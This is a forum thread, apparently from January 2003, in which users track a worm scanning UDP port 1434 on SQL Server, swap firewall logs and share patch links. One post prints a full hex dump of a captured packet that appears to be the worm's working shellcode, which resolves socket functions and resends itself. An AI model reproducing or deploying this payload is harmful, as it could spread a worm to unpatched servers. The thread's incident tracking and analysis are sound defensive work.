| reply to Link Logger
Re: New Worm - UDP 1434 - SQL Server Monitor?? I've seen 5 of these scans in the last 30 or so minutes, mostly from the United Kingdom. It's not affecting my connection at all, really, but it's interesting to see how it develops.
--
Mors Principium Est. |
|
| Re: New Worm - UDP 1434 - SQL Server Monitor?? foxsteve
Port 4662 is for EDONKEY2000
»www.seifried.org/security/ports/···662.html |
|
| said by TeenTech$:
Port 4662 is for EDONKEY2000
The RIAA strikes back !
--
Take my advice, I'm not using it! |
|
| reply to Link Logger
Not getting anything on 4662, but have a handful on 1433 in addition to all the 1434's. |
|
 ircgeeksGot Geek?
join:2002-11-29
Denver, CO | reply to TeenTech$
Dose anyone have the link to the ms hot fix for this? |
|
 Link LoggerPremium,MVM
join:2001-03-29
Calgary, AB
kudos:3 | Its included in SP3
»www.microsoft.com/sql/downloads/2000/sp3.asp
Blake |
|
| reply to Link Logger
port 4662 I believe is normally used by the edonkey p2p client or server, if you use this then traffic on that port is normal after closing the app, if you don't use it but do have a dynamic ip you might have just gotten the ip of someone else who uses it. in any case I'd try to ditch the ip as soon as possible if you can, when I first got the ip I've got now (sept,2001) I guess the person who had it before me ran a edonkey client server, and to put it lightly I recieved about 50,000 hits minimum per day on ports 4662 tcp and 4665 udp for the first 3 months, my router logs were about 250mb's weekly lol |
|
|
|
BOFH5
join:2002-01-07
Colorado Springs, CO | reply to Link Logger
LINK
»www.microsoft.com/technet/securi···-039.asp |
|
robre
join:2002-08-01
Lebanon, TN | reply to Link Logger
HP.com hit: vcsolap2.vcd.hp.com
I hope that this a new one. The others are 6 months old + |
|
| reply to Rockster
Just turned my log back on and have already been hit three times in less than five minutes. Looks like we're in for one hell of a time. |
|
ircgeeksGot Geek?
join:2002-11-29
Denver, CO | i am getting killed it even took down the DNS of one of my co located server's i am on the phone with there netadmin now and he is trying to download the patches and service packs at home so he can burn them and drive to the co lo to install them
--
-- "I feel sorry for people who don't drink. When they wake up in the morning, that's as good as they're going to feel all day." - Frank Sinatra |
|
| reply to spectre84
Some detailed description of how it operates here:
»www.nextgenss.com/advisories/mssql-udp.txt |
|
 foxstevePremium
join:2001-12-28
Campbell, CA
| reply to TeenTech$
I do not distribute copyrighted material and do not use Edonkey2000, Kazaa, Napster or Morpheus, but I use dynamic IP now.
[text was edited by author 2003-01-25 04:34:44]
I reconnected my PC to server and do not have alerts about port 4662 more. Thank you for help.
[text was edited by author 2003-01-25 05:01:13] |
|
ircgeeksGot Geek?
join:2002-11-29
Denver, CO | reply to ircgeeks
Service packs to get we are kind of confused
sql2kasp3.exe 44598 KB sql2ksp3.exe 56435 KB
One is the database one is the analyze server do we need both to fix this problem
--
-- "I feel sorry for people who don't drink. When they wake up in the morning, that's as good as they're going to feel all day." - Frank Sinatra |
|
Link LoggerPremium,MVM
join:2001-03-29
Calgary, AB
kudos:3 Reviews:
 ·Shaw
| reply to spectre84
I am starting to see a couple of double hits, meaning that I seeing a second hit from the same IP address. For example
Jan 25, 2003 06:27:56.560 UTC - (UDP) 207.178.1.10 : 1189 >>> 68.144.129.175 : 1434
Jan 25, 2003 09:05:41.690 UTC - (UDP) 207.178.1.10 : 1189 >>> 68.144.129.175 : 1434
and
Jan 25, 2003 06:25:03.521 UTC - (UDP) 129.59.218.33 : 1079 >>> 68.144.129.175 : 1434
Jan 25, 2003 07:45:48.177 UTC - (UDP) 129.59.218.33 : 1079 >>> 68.144.129.175 : 1434
which somewhat implies that these systems have been going hard for awhile. Glad I'm not paying the bandwidth bill for these guys.
Going through the list of systems that have scanned me, its sad that some of these guys didn't know better as they are so called leaders in the high tech sector.
Blake |
|
robre
join:2002-08-01
Lebanon, TN | reply to Link Logger
intulsa could you put a text rather than a graphic of that honeypot grab up? |
|
 WildcatboyPremium,Mod
join:2000-10-30
Toronto, ON
kudos:2
Security Product V..
Security
| reply to Link Logger
Looking at the packets I'm receiving, source ports vary, this excludes the possibility of the mentioned attack from port 1434 to 1434. At least this is not the first attempt by the worm. To see what else is done, we certainly need a honeypot.
I have a feeling too that the worm is using the heap buffer overflow to run codes on the server and then installs itself and does more.
The initial attempt is a DCE RPC protocol ping: seq_num: 16843009 to UDP port 1434.
--
You can catch the Devil, but you can't hold him long. |
|
| reply to robre
said by robre:
intulsa could you put a text rather than a graphic of that honeypot grab up?
0000 04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0010 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0020 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0030 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0040 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0050 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ................
0060 01 DC C9 B0 42 EB 0E 01 01 01 01 01 01 01 70 AE ....B.........p.
0070 42 01 70 AE 42 90 90 90 90 90 90 90 90 68 DC C9 B.p.B........h..
0080 B0 42 B8 01 01 01 01 31 C9 B1 18 50 E2 FD 35 01 .B.....1...P..5.
0090 01 01 05 50 89 E5 51 68 2E 64 6C 6C 68 65 6C 33 ...P..Qh.dllhel3
00A0 32 68 6B 65 72 6E 51 68 6F 75 6E 74 68 69 63 6B 2hkernQhounthick
00B0 43 68 47 65 74 54 66 B9 6C 6C 51 68 33 32 2E 64 ChGetTf.llQh32.d
00C0 68 77 73 32 5F 66 B9 65 74 51 68 73 6F 63 6B 66 hws2_f.etQhsockf
00D0 B9 74 6F 51 68 73 65 6E 64 BE 18 10 AE 42 8D 45 .toQhsend....B.E
00E0 D4 50 FF 16 50 8D 45 E0 50 8D 45 F0 50 FF 16 50 .P..P.E.P.E.P..P
00F0 BE 10 10 AE 42 8B 1E 8B 03 3D 55 8B EC 51 74 05 ....B....=U..Qt.
0100 BE 1C 10 AE 42 FF 16 FF D0 31 C9 51 51 50 81 F1 ....B....1.QQP..
0110 03 01 04 9B 81 F1 01 01 01 01 51 8D 45 CC 50 8B ..........Q.E.P.
0120 45 C0 50 FF 16 6A 11 6A 02 6A 02 FF D0 50 8D 45 E.P..j.j.j...P.E
0130 C4 50 8B 45 C0 50 FF 16 89 C6 09 DB 81 F3 3C 61 .P.E.P........<a
0140 D9 FF 8B 45 B4 8D 0C 40 8D 14 88 C1 E2 04 01 C2 ...E...@........
0150 C1 E2 08 29 C2 8D 04 90 01 D8 89 45 B4 6A 10 8D ...).......E.j..
0160 45 B0 50 31 C9 51 66 81 F1 78 01 51 8D 45 03 50 E.P1.Qf..x.Q.E.P
0170 8B 45 AC 50 FF D6 EB CA .E.P....
Edit: Previous attempt dropped some lines
[text was edited by author 2003-01-25 04:53:11] |
|
 jig
join:2001-01-05
Hacienda Heights, CA
| 01:47:40pig: IP[Src=195.167.178.244 Dst=24.55.48.160 UDP spo=03194 dpo=01434]}S07>R06nD
01:42:45pig: IP[Src=157.238.135.147 Dst=24.55.48.160 UDP spo=02160 dpo=01434]}S07>R06nD
01:42:02pig: IP[Src=213.132.200.220 Dst=24.55.48.160 UDP spo=04948 dpo=01434]}S07>R06nD
01:42:00pig: IP[Src=152.160.43.242 Dst=24.55.48.160 UDP spo=03361 dpo=01434]}S07>R06nD
01:34:11pig: IP[Src=63.95.45.103 Dst=24.55.48.160 UDP spo=44927 dpo=01434]}S07>R06nD
01:31:48pig: IP[Src=138.23.142.87 Dst=24.55.48.160 UDP spo=02334 dpo=01434]}S07>R06nD
01:31:26pig: IP[Src=212.116.179.158 Dst=24.55.48.160 UDP spo=03295 dpo=01434]}S07>R06nD
01:30:22pig: IP[Src=149.142.75.40 Dst=24.55.48.160 UDP spo=03761 dpo=01434]}S07>R06nD
[text was edited by author 2003-01-25 04:50:24] |
|
